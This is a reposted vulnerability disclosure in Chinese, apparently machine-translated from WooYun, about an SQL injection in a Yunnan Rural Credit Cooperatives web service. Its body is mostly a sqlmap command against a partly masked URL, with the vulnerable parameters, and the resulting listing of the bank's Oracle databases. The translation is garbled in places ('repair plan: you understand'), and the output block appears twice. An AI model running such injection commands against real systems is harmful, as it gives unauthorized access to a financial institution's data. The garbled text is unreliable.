云南省农村信用社智慧农信站SQL问题
漏洞标题 云南省农村信用社智慧农信站SQL问题 相关厂商 ynrcc.com 漏洞作者 冷白开。 提交时间 2016-06-18 21:10 公开时间 2016-06-29 16:39 漏洞类型 SQ…
漏洞标题
云南省农村信用社智慧农村合作站的SQL问题
相关制造商
Ynrcc.com
漏洞作者
冷白。
提交时间
2016-06-18 21: 10
公共时间
2016-06-29 16: 39
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
10
漏洞状态
已提交给第三方合作机构(cncert National Internet Emergency Center)
标签标签
漏洞详细信息
Sqlmap.py -u'http://**。**。**。**/sqh/business/list.html?kindid=328b52a5eb624de68580b3a6119ec4ac& name=3& nowpage=2'--dbs
可用数据库[19]:
[*] APEXX030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RCCMC
[*] SCOTT
[*] SYS
[*] SYSMAN
[*]系统
[*] WMSYS
[*] XDB
漏洞证明:
综上所述
修理计划:
你明白
版权声明:请注明转载的来源。 @乌云
可用数据库[19]:
[*] APEXX030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RCCMC
[*] SCOTT
[*] SYS
[*] SYSMAN
[*]系统
[*] WMSYS
[*] XDB
漏洞证明:
综上所述
修理计划:
你明白
版权声明:请注明转载的来源。 @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 715 )
- 分类:黑客技术
